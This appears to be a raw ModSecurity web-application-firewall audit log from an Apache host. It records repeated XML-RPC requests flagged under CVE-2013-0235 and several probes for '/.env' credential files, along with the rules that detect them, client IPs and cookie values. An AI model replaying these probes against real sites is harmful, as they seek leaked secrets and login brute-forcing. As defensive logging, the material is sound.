"/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7q6zNzfFBMRkII6hmjlgAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750002411043087 929600 (- - -) Stopwatch2: 1750002411043087 929600; combined=2155, p1=368, p2=1327, p3=46, p4=66, p5=220, sr=104, sw=128, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4e919267-Z-- --a947a401-A-- [15/Jun/2025:21:17:52.336543 +0530] aE7rJ9xscloMz_lG7ehv7AAAAAM 128.199.112.101 56798 127.0.0.1 7081 --a947a401-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 496 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --a947a401-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a947a401-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7rJ9xscloMz_lG7ehv7AAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750002471403391 933208 (- - -) Stopwatch2: 1750002471403391 933208; combined=2405, p1=393, p2=1509, p3=54, p4=70, p5=222, sr=118, sw=157, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a947a401-Z-- --7b66c134-A-- [15/Jun/2025:21:18:52.156091 +0530] aE7rYzNzfFBMRkII6hmjzwAAAAI 128.199.112.101 48452 127.0.0.1 7081 --7b66c134-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 495 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --7b66c134-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --7b66c134-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7rYzNzfFBMRkII6hmjzwAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750002531207840 948306 (- - -) Stopwatch2: 1750002531207840 948306; combined=2544, p1=395, p2=1676, p3=48, p4=123, p5=185, sr=111, sw=117, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7b66c134-Z-- --dc9e941c-A-- [15/Jun/2025:21:19:12.414226 +0530] aE7reAG_OhOIIVz6TXR6aAAAAAA 208.88.73.86 34126 127.0.0.1 7081 --dc9e941c-B-- GET /core/.env HTTP/1.0 Host: padah.cstechns.com X-Real-IP: 208.88.73.86 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Accept-Encoding: gzip, br, deflate --dc9e941c-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 04:35:16 GMT ETag: "328-62143b366eaa6" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --dc9e941c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "padah.cstechns.com"] [uri "/core/.env"] [unique_id "aE7reAG_OhOIIVz6TXR6aAAAAAA"] Stopwatch: 1750002552411028 3257 (- - -) Stopwatch2: 1750002552411028 3257; combined=1888, p1=411, p2=1418, p3=0, p4=0, p5=59, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dc9e941c-Z-- --bd2a3d11-A-- [15/Jun/2025:21:19:52.177019 +0530] aE7rnxLQPChAjmM6-0ixXwAAAAQ 128.199.112.101 49708 127.0.0.1 7081 --bd2a3d11-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --bd2a3d11-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --bd2a3d11-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7rnxLQPChAjmM6-0ixXwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750002591265969 911104 (- - -) Stopwatch2: 1750002591265969 911104; combined=2355, p1=387, p2=1604, p3=38, p4=57, p5=174, sr=105, sw=95, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bd2a3d11-Z-- --1cb1677d-A-- [15/Jun/2025:21:20:02.175316 +0530] aE7rqjNzfFBMRkII6hmj9AAAAAI 92.60.40.223 36792 127.0.0.1 7080 --1cb1677d-B-- GET /.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 92.60.40.223 Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.11 aiohttp/3.12.11 --1cb1677d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --1cb1677d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env"] [unique_id "aE7rqjNzfFBMRkII6hmj9AAAAAI"] Stopwatch: 1750002602172020 3365 (- - -) Stopwatch2: 1750002602172020 3365; combined=1961, p1=463, p2=1379, p3=20, p4=25, p5=73, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1cb1677d-Z-- --49ddc21d-A-- [15/Jun/2025:21:20:53.090379 +0530] aE7r3ED4emz4pcZ5aGTinwAAAAE 128.199.112.101 48892 127.0.0.1 7081 --49ddc21d-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --49ddc21d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --49ddc21d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7r3ED4emz4pcZ5aGTinwAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750002652160711 929737 (- - -) Stopwatch2: 1750002652160711 929737; combined=2153, p1=372, p2=1327, p3=46, p4=72, p5=206, sr=108, sw=130, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --49ddc21d-Z-- --e37be368-A-- [15/Jun/2025:21:21:53.734302 +0530] aE7sGOVVOp7UpcMHtmz3FQAAAAc 128.199.112.101 34234 127.0.0.1 7081 --e37be368-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --e37be368-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --e37be368-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7sGOVVOp7UpcMHtmz3FQAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750002712782285 952083 (- - -) Stopwatch2: 1750002712782285 952083; combined=1926, p1=294, p2=1226, p3=45, p4=68, p5=179, sr=82, sw=114, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e37be368-Z-- --1cdb6e4d-A-- [15/Jun/2025:21:22:53.582863 +0530] aE7sVNxscloMz_lG7ehwgwAAAAM 128.199.112.101 45762 127.0.0.1 7081 --1cdb6e4d-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 496 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --1cdb6e4d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --1cdb6e4d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7sVNxscloMz_lG7ehwgwAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750002772646180 936758 (- - -) Stopwatch2: 1750002772646180 936758; combined=1917, p1=362, p2=1140, p3=46, p4=58, p5=197, sr=107, sw=114, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1cdb6e4d-Z-- --d8cfb248-A-- [15/Jun/2025:21:22:57.267945 +0530] aE7sWBLQPChAjmM6-0ixuQAAAAQ 78.168.5.122 46390 127.0.0.1 7081 --d8cfb248-B-- GET /.env HTTP/1.0 Host: www.mindscan.edu.in X-Real-IP: 78.168.5.122 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept-Encoding: gzip, deflate Accept: */* --d8cfb248-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.mindscan.edu.in/wp-json/>; rel="https://api.w.org/" Set-Cookie: _sfs_id=a872d479c10f5fc5a29ac869434472841750002776; expires=Sun, 15 Jun 2025 16:52:56 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --d8cfb248-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.mindscan.edu.in"] [uri "/.env"] [unique_id "aE7sWBLQPChAjmM6-0ixuQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/mindscan.edu.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750002776039970 1228054 (- - -) Stopwatch2: 1750002776039970 1228054; combined=1942, p1=406, p2=1441, p3=0, p4=0, p5=94, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d8cfb248-Z-- --7d06966c-A-- [15/Jun/2025:21:22:57.352024 +0530] aE7sWDNzfFBMRkII6hmkRgAAAAI 78.168.5.122 46406 127.0.0.1 7081 --7d06966c-B-- GET /.env HTTP/1.0 Host: www.mindscan.edu.in X-Real-IP: 78.168.5.122 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept-Encoding: gzip, deflate Accept: */* --7d06966c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.mindscan.edu.in/wp-json/>; rel="https://api.w.org/" Set-Cookie: _sfs_id=48bf18f898f110f663cd62368de533071750002776; expires=Sun, 15 Jun 2025 16:52:56 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --7d06966c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.mindscan.edu.in"] [uri "/.env"] [unique_id "aE7sWDNzfFBMRkII6hmkRgAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/mindscan.edu.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750002776151074 1201015 (- - -) Stopwatch2: 1750002776151074 1201015; combined=2213, p1=455, p2=1666, p3=0, p4=0, p5=91, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7d06966c-Z-- --7b486466-A-- [15/Jun/2025:21:23:52.994089 +0530] aE7skN40YvvHR2Fi0mNBLwAAAAk 128.199.112.101 50040 127.0.0.1 7081 --7b486466-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --7b486466-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --7b486466-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7skN40YvvHR2Fi0mNBLwAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750002832083688 910458 (- - -) Stopwatch2: 1750002832083688 910458; combined=2721, p1=410, p2=1741, p3=47, p4=196, p5=205, sr=124, sw=122, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7b486466-Z-- --8a96b13a-A-- [15/Jun/2025:21:24:53.628252 +0530] aE7szF0gAfK4E6yok-jb8wAAAA4 128.199.112.101 37388 127.0.0.1 7081 --8a96b13a-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 499 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --8a96b13a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --8a96b13a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7szF0gAfK4E6yok-jb8wAAAA4"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750002892646661 981659 (- - -) Stopwatch2: 1750002892646661 981659; combined=2497, p1=365, p2=1701, p3=41, p4=66, p5=197, sr=100, sw=127, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8a96b13a-Z-- --22c86423-A-- [15/Jun/2025:21:25:53.436715 +0530] aE7tCOVVOp7UpcMHtmz3nwAAAAc 128.199.112.101 41412 127.0.0.1 7081 --22c86423-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 503 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --22c86423-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --22c86423-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7tCOVVOp7UpcMHtmz3nwAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750002952476164 960619 (- - -) Stopwatch2: 1750002952476164 960619; combined=2567, p1=402, p2=1646, p3=44, p4=69, p5=285, sr=131, sw=121, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --22c86423-Z-- --2bf89016-A-- [15/Jun/2025:21:26:53.987398 +0530] aE7tRd40YvvHR2Fi0mNBlAAAAAk 128.199.112.101 44844 127.0.0.1 7081 --2bf89016-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --2bf89016-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --2bf89016-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id 